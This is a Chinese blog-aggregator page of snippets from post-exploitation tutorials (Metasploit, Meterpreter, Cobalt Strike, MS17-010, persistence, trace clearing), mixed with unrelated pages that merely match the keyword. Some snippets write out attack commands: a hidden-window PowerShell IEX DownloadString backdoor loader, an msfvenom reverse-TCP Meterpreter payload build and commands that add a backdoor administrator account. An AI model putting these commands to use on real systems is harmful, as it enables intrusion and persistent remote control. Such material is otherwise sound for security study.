后渗透

永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集

申明本文章仅供学习使用环境准备:win7虚拟机(靶机)ip:192.168.56.134kali虚拟机(攻击机)ip:172.18.20.164要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁实验开始:先用nmap扫描一下靶机开了哪几个端口:nmap-Sv-p1-1000192.168.56.134跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole
imbia·2020-06-26 07:01

永恒之蓝漏洞复现(ms17-010)

目录Metasploit使用方法ms17-010漏洞复现1.主机发现2.进入MSF框架3.使用ms17-010扫描模块,对靶机进行扫描4.使用ms17-010攻击模块,对靶机进行攻击后渗透阶段Post后渗透模块查看目标主机是否运行在虚拟机上关闭杀毒软件访问文件系统下载
遇见你··2020-06-26 03:42

metasploit 后渗透模块浅尝

在合天做的实验,感觉很nice,自己收藏记录一下。闲扯:失败和拒绝,都源于自己不够优秀。1.启动msf:msfconsole2.使用exp模块useexploit/windows/brower/ms14_064_ole_code_execution3.查看选项showoptions4.设置必填选项:setsrvhost10.1.1.128setsrvport8060seturipathgoogle
H9_dawn·2020-06-26 02:38

《安藤忠雄论建筑》书摘

从与自然对抗似的矗立着的形象中,感觉到欧洲建筑的背后渗透着人的“理性”,存在着一种“秩序”感。我被它那强烈的力量感所震撼了。同时,通过观赏完全不同的“西欧”,反而更加强烈地意识到了“日本”。
日本建筑译介·2020-06-25 22:22

meterpreter模块之后渗透攻击实战总结

meterpreter模块之后渗透攻击后渗透测试是极为关键的,也是测试客户业务是否安全影响最大的一部文章目录meterpreter模块之后渗透攻击一:进程迁移二:系统命令1:查看系统信息2:查看目标主机运行时间
MX-LQ·2020-06-25 22:02

Metasploit(后渗透攻击:操作系统后门)

在完成了权限提升之后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。1.Cymothoa后门Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。他所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管
毕竟话少·2020-06-25 20:04

Metasploit(后渗透攻击:权限提升)

通常,我们在渗透攻击时很有可能只获得了一个系统的Guest或User权限。低的权限级别将使我们受到很多的限制,在实施横向渗透或者提权攻击时将很困难。在主机上如果没有管理者权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guset提升到User,再到Administrator,最后到System级别。渗透的最终目的是获取服务器的最高权限,即windo
毕竟话少·2020-06-25 20:04

Metasploit(后渗透攻击:web后门)

web后门泛指webshell,其实就是一段网页代码,包括ASP.ASP.NET.PHP.JSP.代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。1.meterpreter后门在metasploit中,有一个名为phpmet
毕竟话少·2020-06-25 20:33

后渗透(二)

更新了文章一的cmd命令一.基础知识(端口,系统等)1.关于服务模式以服务模式运行的程序,默认拥有的权限为System权限:eg:将我们的程序制作成服务运行服务的方式或计划任务方式或exp方式获取。2.常用渗透端口21:FTP端口25:SMTP邮件通信服务端口1433:SQLServer数据库通信端口1723:VPN通信端口3306:MYSQL数据库通信端口3389:Windows远程桌面通信端口
YYK[17|6]·2020-06-25 18:13

后渗透(三)

一.中间件提权1.mysql提权首先我们要知道的是在提权之前的几个必要条件1)必须拥有root账号和密码。2)通过查看Mysql的版本号进行下一步渗透:当版本号Mysql大于5.1时,需在lib目录下新建plugin文件,才可以导出UDF;当大于5.6.34后,它会有安全模式:--secure-file-priv,禁止使用sql命令写入或写出其次,对应第一步,我们如何查找root账户和密码1)通过
YYK[17|6]·2020-06-25 18:13

后渗透(一)

一.前言本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。
YYK[17|6]·2020-06-25 18:13

msf后渗透之假冒令牌

msf后渗透之假冒令牌1.假冒令牌原理:假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所谓的令牌:例如当一个用户登录系统,则它会被赋予一个访问令牌作为认证信息。
CL0ud1·2020-06-25 16:51

后渗透之meterpreter使用攻略

本文转载来源:https://xz.aliyun.com/t/2536Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式
小布丁吃西瓜·2020-06-25 14:58

渗透笔记之渗透测试流程篇

文章目录一、PTES标准渗透测试流程1PTES:前期交互阶段2PTES:情报搜集阶段3PTES:威胁建模阶段4PTES:漏洞分析阶段5PTES:渗透攻击阶段6PTES:后渗透攻击阶段7PTES:报告阶段二
一只哈士奇ღ·2020-06-25 12:56

渗透攻防工具篇-后渗透阶段的Meterpreter

文章作者zusheng文章来源i春秋原创奖励计划时间2016年8月23日14:38:43前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下
qdslg·2020-06-24 21:39

利用cobalt strike获取域控权限

cobaltstrikecobaltstrike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。前期准备获取一个cobaltstrike的会话。
mirror97black·2020-06-24 15:38

windows中常见后门持久化方法总结

前言当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法后门持久化我的操作环境是:
god_7z1·2020-06-23 10:38

后渗透工具Empire使用教程

一、前言Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。
vege·2020-06-22 23:00

Powershell攻击指南----黑客后渗透之道

分享下之前就看到的一套不错的系列课程~公众号近日一直受到恶意举报,屏蔽了原创功能,哪天就快被封号了,这个号也不赚钱,包括网站也是一直亏钱运营,我本人也会放慢更新频率,以后更多的内容可能是分享我觉得不错的教程、书籍等内容,感谢大家支持,谢谢。想加知识星球学习可以加下,星球是免费的(有几千个网络安全内容吧,记得申请的时候简单介绍自己,不然认为是发广告的),网站(www.secshi.com)每天签个到
「已注销」·2020-06-22 14:37

CVE-2019-0708漏洞,kali的msf中模块利用复现

CVE-2019-0708漏洞,kali的msf中模块利用最近在学习渗透过程,后渗透内网阶段,因为查找对应msf在安卓或者windows的shell获取中偶然发现这个漏洞,所以自己复现一下,在此记录一下自己复现过程中参考的资料和出现的问题
Mr_jingjing·2020-06-22 02:25

后渗透篇:清理windows入侵痕迹总结【详细】

当你的才华还撑不起你的野心时那你就应该静下心来学习目录清理windows入侵痕迹0x01前言了解为什么需要清除入侵痕迹?一、设置跳板二、必不可少的跳板三、代理服务器简介1)http代理服务器2)Sock5代理服务器3)VPN代理服务器四、使用Tor隐身了解需要删除哪些日志?1.默认提供的日志2.防火墙日志3.IIS日志4、netstat-an表示什么意思?0x02清除Windows日志0x01.1
Agan '·2020-06-21 21:06

后渗透篇:Linux 后门类型【总结】

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02增加超级用户0x03小案例0x04破解0x05放置SUIDShell0x06Crontab后门0x07ssh公钥免密0x08alias后门0x09pam后门oropenssh0x10SSH后门0x11SSHwrapper后门简介0x12mafixrootkit0x13利用系统服务程序0x14TCP/UDP/ICMPShell
Agan '·2020-06-21 21:06

后渗透篇:一款不错的PowerShell后门(无毒隐蔽性极强)

这款后门一共有三个模式,下面给大家依次讲解他们的不同,请大家按照需求使用!第一款Backd00r-webshell.zip使用方法:CMD执行powershell.exe-nop-windowstylehidden-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('绝对路径或者远程路径/Backd00r-webshell.ps1')
Agan '·2020-06-21 21:35

Pentest Wiki Part4 后渗透(一)

后渗透0x01前言后渗透是渗透测试的关键组成部分。这就是您将自己与普通黑客区分开来的地方,实际上可以从渗透测试中提供有价值的信息和情报。
FLy_鹏程万里·2020-06-21 20:04

网络安全 (十 后渗透

windows用户账号后门netusernetuseraa/addnetlocalgroupadministratorsa/add我的电脑—管理—本地用户组,在创建后的用户右击设置密码打开注册表regedit,选择SAM,添加一个everyone权限,完全控制找下管理员的名称,以及对应的类型名称0x1f4,再找到管理员的二进制数值,全选复制同样的操作,找到自己创建的用户,将管理员的二进制数值粘贴到
Aidang·2020-06-21 16:03

提权 --Windows提权方式总结

2.1环境一览2.2靶机环境搭建三、信息收集3.1前提条件3.2基本信息收集3.2.1判断操作系统3.2.2判别当前权限3.2.3其它信息获取3.3高级信息收集3.3.1获取安装软件信息3.3.2wmic后渗透命令四
風月长情·2020-06-21 16:55

Windows下的本地提权漏洞梳理及后渗透简析

1.github网址,截图,不同系统版本对应的漏洞2.后渗透阶段壹通过1day漏洞进行Windows本地提权分享一个github链接:Windows提权漏洞整理里面大部分是基于x64系统的漏洞直接利用程序
Alexz__·2020-06-20 21:25

后渗透(八)令牌假冒简介与Windows域搭建

0x00:令牌假冒简介假冒令牌可以假冒一个网络中的另一个用户进行各种操作。令牌包括登录会话的安全信息,如用户身份识别、用户组和用户权限。当一个用户登录Windows系统时,他被给定一个访问令牌作为他认证会话的一部分。例如:一个入侵用户可能需要以域管理员处理一个特定任务,当他使用令牌便可假冒域管理员进行工作。0x01:windows域搭建xxx0x02:准备kalilinux192.168.109.
Michae1_k·2020-06-17 11:00

Metasploit Framework(一)

MSF基础模块大致分为Aux辅助模块、Exploits渗透攻击模块、Post后渗透攻击模块、Payloads攻击载荷模块、Encoders编码器模块、Nops空指令模块启动MSF之前,先开启企业级的sql
ch0bits·2020-06-04 19:00

今日感恩

感恩老师们高效优质课的展示,每一个老师都有自己的创意,有自己独特的教学设计,课例展示的背后渗透着老师们的教育理念和教学态度的巨大转变。
方正省·2020-03-29 20:49

不过。【意识流风】

大片阳光糊在后背,黏乎乎的热凝在黑色衬衫表层,尔后渗透进皮肤让里子烧灼开来。看你也坐不住啊,哥这样说着,挪了身。
聂臻·2020-03-27 20:15

喝水-除杂和补充营养

它慢慢的滋润着我久已干涸的肠胃,然后渗透身体,不一会身体的每一个细胞都苏醒了。它们争先恐后的吸取着水分,润透经一夜呼吸而释放留在细胞内不需要的杂物以及毒气形成液体在慢慢渗透到肠胃,再排出体外。
次第花开之心灵感悟·2020-03-25 11:42

【Metasploit魔鬼训练营】第一章总结

渗透测试的七大阶段前期交互情报搜集威胁建模漏洞分析渗透攻击后渗透攻击报告渗透测试中最核心和基本内容找出目标系统中存在的安全漏洞,并实施渗透攻击。Metasploit框架中最重
Pino_HD·2020-03-08 23:21

黑客技术:基于Python的反连Shell和后渗透工具(仅供参考)

RSPET(ReverseShellandPostExploitationTool)是一个基于Python的反连shell,并且具备后渗透阶段的一些功能。
妄心xyx·2020-03-08 09:24

渗透导论

安全问题根源分层问题的优劣只追求功能实现最大的威胁是人安全目标先于攻击者发现和防止漏洞攻击型安全防御型安全渗透测试标准PETS前期交互阶段(一般不包含社工、DDOS)情报收集阶段(IP,员工,邮箱..)威胁建模阶段漏洞分析阶段渗透攻击阶段后渗透测试阶段
linx255·2020-02-24 21:46

CS强化_python免杀

CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以pythonpayload为例展开。
RabbitMask·2020-02-09 17:28

从永恒之蓝看后渗透

我们今天的故事,从永恒之蓝开始……工具地址:https://github.com/worawit/MS17-010管道探测:python2checker.py192.168.154.138程序执行:msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.154.159lport=4444-fexe-orabbit.exe变更如下函数,免杀处理后
RabbitMask·2020-02-06 02:58

网易云《水乡》热评

苍茫在湖畔烟雨楼前楼后渗透在一木一花的骨髓中。阴阴霾霾与天地烟雨,将水乡柔化成灵蕴和一份独特的惬意。烟起雾落,云蒸霞蔚。月明高照,酒到正酣。停在彼岸的,除了相思还有跟随江风而来的醉意,狂意。
龙猫加龙马·2020-02-02 03:20

一月八号学习日报

一月八号学习日报今天上午学习的有:开始对昨天的回顾,Metasploit——msfvenom免杀木马后渗透之meterpreter使用攻略之后老师还讲了信息收集思维导图如下:其中渗透测试网络资产的概念为
老夫秀吉·2020-01-08 22:00

Arxiv网络科学论文摘要11篇(2017-09-22)

核工业辐射影响的技术经济分析新方法;具有敏感性的离散时间极性意见动力学;建模和量化力量推动在线视频流行演变;粗粒度可再生电力网络中传输容量的扩大;重新审视多层网络模块化中的分辨率和层间耦合因子;局部优化决策的滞后渗透
ComplexLY·2020-01-07 14:50

用户流失报告:因“玩腻”而弃游,近5成流失用户转去短视频/直播

《王者荣耀》:渗透率稳定在16%左右,近5成老用户因“玩腻”而弃游《王者荣耀》于2015年11月上线,渗透率一路上升,2017年暑期达到顶峰,为25.5%;2017年后渗透率便呈下滑趋势,渗透率跌至16%
游戏陀螺·2020-01-06 00:00

内网渗透实战技巧

目录拿下Web服务器phpmyadmin后台getshell后渗透第一步派生CobaltStrike权限获得System权限获取账号密码远程桌面登录添加路由、挂Socks4a代理域信息收集内网主机信息收集内网存活主机探测内网存活主机端口扫描内网存活主机服务探测内网横向渗透攻击技巧
谢公子·2020-01-02 10:54

在冬未来临前挥散过去,然后渗透在天空与地面的交界处,没有希望,何必远方。俗世有静好,枫落香未尽,以素色代马,赏隔岸花开花落。烟花易冷,昙花一现,仅一瞬间,达不到矢志不渝,只需倾心燃尽,点缀一方。
小周_e7e5·2019-12-28 17:04

红队核心工具介绍

这个社区驱动的框架,似乎每天更新,拥有所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可能使用Metasploit通过MS17-010
Cross宋·2019-12-26 19:00

理想,是世界上最贵的东西

曾厝垵进一步沦陷为旅游景区,小吃街和卖品店不断向后渗透,游客密度比鼓浪屿龙
乔淼·2019-12-25 07:25

Powersploit在内网渗透中的使用

htmlpowershell绕过执行策略限制本地权限绕过执行本地隐藏权限绕过执行脚本直接用IEX下载远程的PS1脚本回来权限绕过执行powersploitpowersploit一款基于powershell的后渗透
sum3mer·2019-12-24 03:40

cnblogs:内网渗透的一些工具和平台汇总

渗透测试平台类Metasploit:这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备。
AlexMercer313·2019-12-21 22:54

cobalt strike 快速上手

原文:https://klionsec.github.io/2017/09/23/cobalt-strike/#menu0x01关于CobaltStrike123一款非常优秀的后渗透平台[谁用谁知道,嘿嘿
_nul1·2019-12-08 19:00

后渗透-Windows远程桌面

查看是否开启远程桌面0x1表示关闭;0x0表示开启REGQUERY"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer"/vfDenyTSConnectionsimage.png查看远程桌面的端口号得到的结果为16进制格式REGQUERY"HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro
Instu·2019-12-06 22:33

Cobalt Strike第一章

前言:一款非常优秀的后渗透平台工具基于java,大部分功能在改进的基础上还是相对比较实用的,非常适合团队间协同作战。简称CS一、后渗透神器CobaltStrike的安装安装教程参考这篇文章。
二潘·2019-11-25 16:30
上一页 2 3 4 5 6 7 8 9 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他